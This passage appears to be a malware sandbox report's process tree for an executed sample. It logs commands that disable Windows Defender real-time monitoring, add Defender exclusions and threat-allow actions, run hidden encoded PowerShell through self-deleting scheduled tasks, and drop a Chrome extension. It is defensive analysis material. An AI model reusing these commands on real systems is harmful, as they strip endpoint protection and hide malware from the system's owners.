                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:2568
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                          4⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:988
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:1284
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                            4⤵
                                                                                                                                            • Modifies Windows Defender Real-time Protection settings
                                                                                                                                            PID:2972
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "gRLIqqKdW" /SC once /ST 11:21:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                          3⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:3188
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "gRLIqqKdW"
                                                                                                                                          3⤵
                                                                                                                                            PID:3152
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "gRLIqqKdW"
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:4020
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                            3⤵
                                                                                                                                            • Indirect Command Execution
                                                                                                                                            PID:4092
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                              4⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:1496
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                5⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:752
                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                  6⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:4084
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:3436
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                              • Windows security bypass
                                                                                                                                              PID:2328
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1840
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              4⤵
                                                                                                                                              • Windows security bypass
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:1572
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:376
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              4⤵
                                                                                                                                                PID:1720
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                              3⤵
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              PID:1524
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2616
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\tUTrGdrv\TMidNjDVQiNOZQkR.wsf"
                                                                                                                                              3⤵
                                                                                                                                                PID:1620
                                                                                                                                              • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\tUTrGdrv\TMidNjDVQiNOZQkR.wsf"
                                                                                                                                                3⤵
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:3236
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2040
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2136
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2568
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2972
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2456
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3300
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3820
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2360
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:1756
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3884
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:1380
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:3288
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3528
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2444
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:3508
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:2688
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:2872
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:616
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2560
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2520
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:3632
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2300
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3704
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:1772
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3168
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4016
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3204
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:2264
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3028
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:920
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2432
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3148
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3368
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2568
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3216
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:3152
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /CREATE /TN "goLFBWfCc" /SC once /ST 07:54:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                            PID:3112
                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                            schtasks /run /I /tn "goLFBWfCc"
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:1852
                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                              schtasks /DELETE /F /TN "goLFBWfCc"
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:2272
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:1972
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:752
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1012
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:2448
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 00:22:15 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\avHGHQo.exe\" 9Z /nDPsdidrm 385121 /S" /V1 /F
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:3436
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3168
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1200 -s 620
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:1920
                                                                                                                                                                                  • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\avHGHQo.exe
                                                                                                                                                                                    C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\avHGHQo.exe 9Z /nDPsdidrm 385121 /S
                                                                                                                                                                                    2⤵
                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                    PID:376
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:2840
                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                          4⤵
                                                                                                                                                                                          • Indirect Command Execution
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:920
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                            5⤵
                                                                                                                                                                                              PID:3108
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:1076
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                                                            PID:988
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                              5⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:1032
                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                                PID:3116
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
